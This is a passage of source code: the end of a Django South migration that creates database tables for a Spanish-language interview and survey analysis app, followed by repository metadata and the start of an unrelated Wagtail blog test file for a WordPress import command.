('pregunta_7b', models.ForeignKey(orm[u'analisis.pregunta_7b'], null=False)),
('seleccion_7b', models.ForeignKey(orm[u'configuracion.seleccion_7b'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_7b_id', 'seleccion_7b_id'])
# Adding model 'Pregunta_8'
db.create_table(u'analisis_pregunta_8', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('organizacion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mapeo.Organizaciones'])),
('territorio1', self.gf('django.db.models.fields.IntegerField')()),
('periodo1', self.gf('django.db.models.fields.IntegerField')()),
('profundidad1', self.gf('django.db.models.fields.IntegerField')()),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_8'])
# Adding M2M table for field tema on 'Pregunta_8'
m2m_table_name = db.shorten_name(u'analisis_pregunta_8_tema')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_8', models.ForeignKey(orm[u'analisis.pregunta_8'], null=False)),
('tema_relacion', models.ForeignKey(orm[u'configuracion.tema_relacion'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_8_id', 'tema_relacion_id'])
# Adding model 'Pregunta_9'
db.create_table(u'analisis_pregunta_9', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('tema', self.gf('django.db.models.fields.IntegerField')()),
('prioridad1', self.gf('django.db.models.fields.IntegerField')()),
('papel1', self.gf('django.db.models.fields.IntegerField')()),
('conocimiento', self.gf('django.db.models.fields.IntegerField')()),
('experiencia', self.gf('django.db.models.fields.IntegerField')()),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_9'])
# Adding model 'Pregunta_11'
db.create_table(u'analisis_pregunta_11', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('sobre', self.gf('django.db.models.fields.IntegerField')()),
('tipo_estudio1', self.gf('django.db.models.fields.IntegerField')()),
('calendario', self.gf('django.db.models.fields.IntegerField')()),
('disponibilidad1', self.gf('django.db.models.fields.IntegerField')()),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_11'])
def backwards(self, orm):
# Deleting model 'Entrevista'
db.delete_table(u'analisis_entrevista')
# Removing M2M table for field departamento on 'Entrevista'
db.delete_table(db.shorten_name(u'analisis_entrevista_departamento'))
# Deleting model 'Pregunta_1'
db.delete_table(u'analisis_pregunta_1')
# Removing M2M table for field ubicacion on 'Pregunta_1'
db.delete_table(db.shorten_name(u'analisis_pregunta_1_ubicacion'))
# Removing M2M table for field socio on 'Pregunta_1'
db.delete_table(db.shorten_name(u'analisis_pregunta_1_socio'))
# Removing M2M table for field tema on 'Pregunta_1'
db.delete_table(db.shorten_name(u'analisis_pregunta_1_tema'))
# Deleting model 'Pregunta_2'
db.delete_table(u'analisis_pregunta_2')
# Deleting model 'Pregunta_3'
db.delete_table(u'analisis_pregunta_3')
# Removing M2M table for field grupo on 'Pregunta_3'
db.delete_table(db.shorten_name(u'analisis_pregunta_3_grupo'))
# Deleting model 'Pregunta_4'
db.delete_table(u'analisis_pregunta_4')
# Removing M2M table for field grupo_beneficiario on 'Pregunta_4'
db.delete_table(db.shorten_name(u'analisis_pregunta_4_grupo_beneficiario'))
# Removing M2M table for field tema on 'Pregunta_4'
db.delete_table(db.shorten_name(u'analisis_pregunta_4_tema'))
# Deleting model 'Pregunta_5a'
db.delete_table(u'analisis_pregunta_5a')
# Removing M2M table for field ubicacion on 'Pregunta_5a'
db.delete_table(db.shorten_name(u'analisis_pregunta_5a_ubicacion'))
# Removing M2M table for field socio on 'Pregunta_5a'
db.delete_table(db.shorten_name(u'analisis_pregunta_5a_socio'))
# Removing M2M table for field tema on 'Pregunta_5a'
db.delete_table(db.shorten_name(u'analisis_pregunta_5a_tema'))
# Deleting model 'Pregunta_5c'
db.delete_table(u'analisis_pregunta_5c')
# Removing M2M table for field papel_1 on 'Pregunta_5c'
db.delete_table(db.shorten_name(u'analisis_pregunta_5c_papel_1'))
# Deleting model 'Pregunta_5d'
db.delete_table(u'analisis_pregunta_5d')
# Removing M2M table for field categoria on 'Pregunta_5d'
db.delete_table(db.shorten_name(u'analisis_pregunta_5d_categoria'))
# Deleting model 'Pregunta_5e'
db.delete_table(u'analisis_pregunta_5e')
# Removing M2M table for field categoria_fuente on 'Pregunta_5e'
db.delete_table(db.shorten_name(u'analisis_pregunta_5e_categoria_fuente'))
# Deleting model 'Pregunta_6a'
db.delete_table(u'analisis_pregunta_6a')
# Removing M2M table for field ubicacion on 'Pregunta_6a'
db.delete_table(db.shorten_name(u'analisis_pregunta_6a_ubicacion'))
# Removing M2M table for field tema on 'Pregunta_6a'
db.delete_table(db.shorten_name(u'analisis_pregunta_6a_tema'))
# Deleting model 'Pregunta_6c'
db.delete_table(u'analisis_pregunta_6c')
# Removing M2M table for field papel on 'Pregunta_6c'
db.delete_table(db.shorten_name(u'analisis_pregunta_6c_papel'))
# Deleting model 'Pregunta_6d'
db.delete_table(u'analisis_pregunta_6d')
# Removing M2M table for field categoria on 'Pregunta_6d'
db.delete_table(db.shorten_name(u'analisis_pregunta_6d_categoria'))
# Deleting model 'Pregunta_6e'
db.delete_table(u'analisis_pregunta_6e')
# Removing M2M table for field categoria_conocimient on 'Pregunta_6e'
db.delete_table(db.shorten_name(u'analisis_pregunta_6e_categoria_conocimient'))
# Deleting model 'Pregunta_7a'
db.delete_table(u'analisis_pregunta_7a')
# Removing M2M table for field ubicacion on 'Pregunta_7a'
db.delete_table(db.shorten_name(u'analisis_pregunta_7a_ubicacion'))
# Removing M2M table for field seleccion on 'Pregunta_7a'
db.delete_table(db.shorten_name(u'analisis_pregunta_7a_seleccion'))
# Deleting model 'Pregunta_7b'
db.delete_table(u'analisis_pregunta_7b')
# Removing M2M table for field seleccion on 'Pregunta_7b'
db.delete_table(db.shorten_name(u'analisis_pregunta_7b_seleccion'))
# Deleting model 'Pregunta_8'
db.delete_table(u'analisis_pregunta_8')
# Removing M2M table for field tema on 'Pregunta_8'
db.delete_table(db.shorten_name(u'analisis_pregunta_8_tema'))
# Deleting model 'Pregunta_9'
db.delete_table(u'analisis_pregunta_9')
# Deleting model 'Pregunta_11'
db.delete_table(u'analisis_pregunta_11')
models = {
u'analisis.entrevista': {
'Meta': {'object_name': 'Entrevista'},
'alcance1': ('django.db.models.fields.IntegerField', [], {}),
'departamento': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['lugar.Departamento']", 'symmetrical': 'False'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'fecha': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organizacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mapeo.Organizaciones']"}),
'pais': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lugar.Pais']"}),
'posicion': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'telefono': ('django.db.models.fields.IntegerField', [], {}),
'tipo_estudio': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.Tipo_Estudio']"}),
'usuario': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'analisis.pregunta_1': {
'Meta': {'object_name': 'Pregunta_1'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
'estado1': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'proyecto': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'socio': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['mapeo.Organizaciones']", 'symmetrical': 'False'}),
'tema': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Tema']", 'symmetrical': 'False'}),
'ubicacion': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['lugar.Municipio']", 'symmetrical': 'False'})
},
u'analisis.pregunta_11': {
'Meta': {'object_name': 'Pregunta_11'},
'calendario': ('django.db.models.fields.IntegerField', [], {}),
'disponibilidad1': ('django.db.models.fields.IntegerField', [], {}),
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sobre': ('django.db.models.fields.IntegerField', [], {}),
'tipo_estudio1': ('django.db.models.fields.IntegerField', [], {})
},
u'analisis.pregunta_2': {
'Meta': {'object_name': 'Pregunta_2'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
'hombre': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mujer': ('django.db.models.fields.IntegerField', [], {}),
'seleccion1': ('django.db.models.fields.IntegerField', [], {})
},
u'analisis.pregunta_3': {
'Meta': {'object_name': 'Pregunta_3'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
'grupo': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Grupo']", 'symmetrical': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'analisis.pregunta_4': {
'Meta': {'object_name': 'Pregunta_4'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
'grupo_beneficiario': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Grupo']", 'symmetrical': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'impacto': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'tema': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Tema']", 'symmetrical': 'False'})
},
u'analisis.pregunta_5a': {
'Meta': {'object_name': 'Pregunta_5a'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'prioritizado': ('django.db.models.fields.IntegerField', [], {}),
'socio': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['mapeo.Organizaciones']", 'symmetrical': 'False'}),
'tema': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Tema']", 'symmetrical': 'False'}),
'ubicacion': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['lugar.Municipio']", 'symmetrical': 'False'})
},
u'analisis.pregunta_5c': {
'Meta': {'object_name': 'Pregunta_5c'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Pregunta_5a']"}),
'organizacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mapeo.Organizaciones']"}),
'papel_1': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Papel']", 'symmetrical': 'False'})
},
u'analisis.pregunta_5d': {
'Meta': {'object_name': 'Pregunta_5d'},
'categoria': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Categoria']", 'symmetrical': 'False'}),
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Pregunta_5a']"})
},
u'analisis.pregunta_5e': {
'Meta': {'object_name': 'Pregunta_5e'},
'categoria_fuente': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Categoria_Fuente']", 'symmetrical': 'False'}),
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
'fuente': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Pregunta_5a']"})
},
u'analisis.pregunta_6a': {
'Meta': {'object_name': 'Pregunta_6a'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'prioritizado': ('django.db.models.fields.IntegerField', [], {}),
'tema': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Tema']", 'symmetrical': 'False'}),
'ubicacion': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['lugar.Municipio']", 'symmetrical': 'False'})
},
u'analisis.pregunta_6c': {
'Meta': {'object_name': 'Pregunta_6c'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Pregunta_6a']"}),
'organizacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mapeo.Organizaciones']"}),
'papel': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Papel']", 'symmetrical': 'False'})
},
u'analisis.pregunta_6d': {
'Meta': {'object_name': 'Pregunta_6d'},
'categoria': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Categoria']", 'symmetrical': 'False'}),
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Pregunta_6a']"})
},
u'analisis.pregunta_6e': {
'Meta': {'object_name': 'Pregunta_6e'},
'categoria_conocimient': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Categoria_Conocimiento']", 'symmetrical': 'False'}),
'categoria_innovacio': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.Categoria_Innovacion']"}),
'conocimient': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'innovacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Pregunta_6a']"})
},
u'analisis.pregunta_7a': {
'Meta': {'object_name': 'Pregunta_7a'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'seleccion': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Seleccion_7a']", 'symmetrical': 'False'}),
'ubicacion': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['lugar.Municipio']", 'symmetrical': 'False'})
},
u'analisis.pregunta_7b': {
'Meta': {'object_name': 'Pregunta_7b'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'seleccion': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Seleccion_7b']", 'symmetrical': 'False'})
},
u'analisis.pregunta_8': {
'Meta': {'object_name': 'Pregunta_8'},
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'organizacion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mapeo.Organizaciones']"}),
'periodo1': ('django.db.models.fields.IntegerField', [], {}),
'profundidad1': ('django.db.models.fields.IntegerField', [], {}),
'tema': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['configuracion.Tema_Relacion']", 'symmetrical': 'False'}),
'territorio1': ('django.db.models.fields.IntegerField', [], {})
},
u'analisis.pregunta_9': {
'Meta': {'object_name': 'Pregunta_9'},
'conocimiento': ('django.db.models.fields.IntegerField', [], {}),
'entrevistado': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['analisis.Entrevista']"}),
'experiencia': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'papel1': ('django.db.models.fields.IntegerField', [], {}),
'prioridad1': ('django.db.models.fields.IntegerField', [], {}),
'tema': ('django.db.models.fields.IntegerField', [], {})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'configuracion.areaaccion': {
'Meta': {'object_name': 'AreaAccion'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'configuracion.categoria': {
'Meta': {'object_name': 'Categoria'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.categoria_conocimiento': {
'Meta': {'object_name': 'Categoria_Conocimiento'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.categoria_fuente': {
'Meta': {'object_name': 'Categoria_Fuente'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.categoria_innovacion': {
'Meta': {'object_name': 'Categoria_Innovacion'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.grupo': {
'Meta': {'object_name': 'Grupo'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.papel': {
'Meta': {'object_name': 'Papel'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.plataforma': {
'Meta': {'object_name': 'Plataforma'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'sitio_accion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.SitioAccion']"})
},
u'configuracion.sector': {
'Meta': {'object_name': 'Sector'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'configuracion.seleccion_7a': {
'Meta': {'object_name': 'Seleccion_7a'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.seleccion_7b': {
'Meta': {'object_name': 'Seleccion_7b'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.sitioaccion': {
'Meta': {'object_name': 'SitioAccion'},
'area_accion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.AreaAccion']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'configuracion.tema': {
'Meta': {'object_name': 'Tema'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tema': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'configuracion.tema_relacion': {
'Meta': {'object_name': 'Tema_Relacion'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'configuracion.tipo_estudio': {
'Meta': {'object_name': 'Tipo_Estudio'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'lugar.departamento': {
'Meta': {'ordering': "['nombre']", 'object_name': 'Departamento'},
'extension': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'pais': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lugar.Pais']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'unique': 'True', 'null': 'True'})
},
u'lugar.municipio': {
'Meta': {'ordering': "['departamento__nombre', 'nombre']", 'object_name': 'Municipio'},
'departamento': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lugar.Departamento']"}),
'extension': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'latitud': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'longitud': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'unique': 'True', 'null': 'True'})
},
u'lugar.pais': {
'Meta': {'object_name': 'Pais'},
'codigo': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'mapeo.organizaciones': {
'Meta': {'ordering': "[u'nombre']", 'unique_together': "((u'font_color', u'nombre'),)", 'object_name': 'Organizaciones'},
'area_accion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.AreaAccion']"}),
'contacto': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'correo_electronico': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'departamento': ('smart_selects.db_fields.ChainedForeignKey', [], {'to': u"orm['lugar.Departamento']"}),
'direccion': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'font_color': ('mapeo.models.ColorField', [], {'unique': 'True', 'max_length': '10', 'blank': 'True'}),
'fundacion': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'generalidades': ('ckeditor.fields.RichTextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': (u'sorl.thumbnail.fields.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'municipio': ('smart_selects.db_fields.ChainedForeignKey', [], {'to': u"orm['lugar.Municipio']"}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'pais': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lugar.Pais']"}),
'plataforma': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.Plataforma']"}),
'rss': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'sector': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.Sector']"}),
'siglas': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'sitio_accion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.SitioAccion']"}),
'sitio_web': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'telefono': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'temas': ('ckeditor.fields.RichTextField', [], {'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['analisis']
|
{
"content_hash": "d768cfccd29ff5565ba150a2af6030e4",
"timestamp": "",
"source": "github",
"line_count": 824,
"max_line_length": 187,
"avg_line_length": 63.599514563106794,
"alnum_prop": 0.5938060527420524,
"repo_name": "shiminasai/ciat_plataforma",
"id": "654ca43f4dda5773dd2c61d780ea313a0140a1bf",
"size": "52430",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "analisis/analisis/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "471726"
},
{
"name": "HTML",
"bytes": "1796979"
},
{
"name": "JavaScript",
"bytes": "1492281"
},
{
"name": "Python",
"bytes": "3447075"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
import json
from django_comments_xtd.models import XtdComment
from wagtail.wagtailcore.models import Page
from django.contrib.auth.models import User
from .models import (BlogPage, BlogTag, BlogPageTag, BlogIndexPage,
BlogCategory, BlogCategoryBlogPage)
from .management.commands.wordpress_to_wagtail import Command
class BlogTests(TestCase):
def setUp(self):
home = Page.objects.get(slug='home')
self.user = User.objects.create_user('test', 'test@test.test', 'pass')
self.blog_index = home.add_child(instance=BlogIndexPage(
title='Blog Index', slug='blog', search_description="x",
owner=self.user))
def test_index(self):
url = self.blog_index.url
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
blog_page = self.blog_index.add_child(instance=BlogPage(
title='Blog Page', slug='blog_page1', search_description="x",
owner=self.user))
url = blog_page.url
res = self.client.get(url)
self.assertContains(res, "Blog Page")
def test_import(self):
"""
Tests migrate_wordpress command -
the command should do the following:
1. create BlogPage objects from a given BlogIndex
2. create category and tag objects as BlogCategory,
BlogTag, BlogPageBlogCategory and BlogPageTag objects
The test imports from test-data.json which includes one wordpress blog
post with 11 tags and 2 categories
"""
command = Command()
command.username = None
command.password = None
command.should_import_comments = True
command.blog_to_migrate = 'just_testing'
with open('test-data.json') as test_json:
posts = json.load(test_json)
command.create_blog_pages(posts, self.blog_index)
self.assertEquals(Page.objects.all().count(), 4)
self.assertEquals(BlogPage.objects.all().count(), 1)
page = BlogPage.objects.get()
self.assertEqual(page.title, "My wordpress title")
self.assertInHTML("<strong>Bold here</strong>", page.body)
self.assertEqual(page.categories.count(), 2)
self.assertEqual(page.tags.count(), 11)
self.assertEqual(page.owner.id, 2)
self.assertEqual(BlogCategory.objects.all().count(), 2)
self.assertEqual(BlogTag.objects.all().count(), 11)
self.assertEqual(BlogCategoryBlogPage.objects.all().count(), 2)
self.assertEqual(BlogPageTag.objects.all().count(), 11)
parent_category = BlogCategory.objects.get(slug="writing-wisdom")
child_category = BlogCategory.objects.get(slug="swoon-reads")
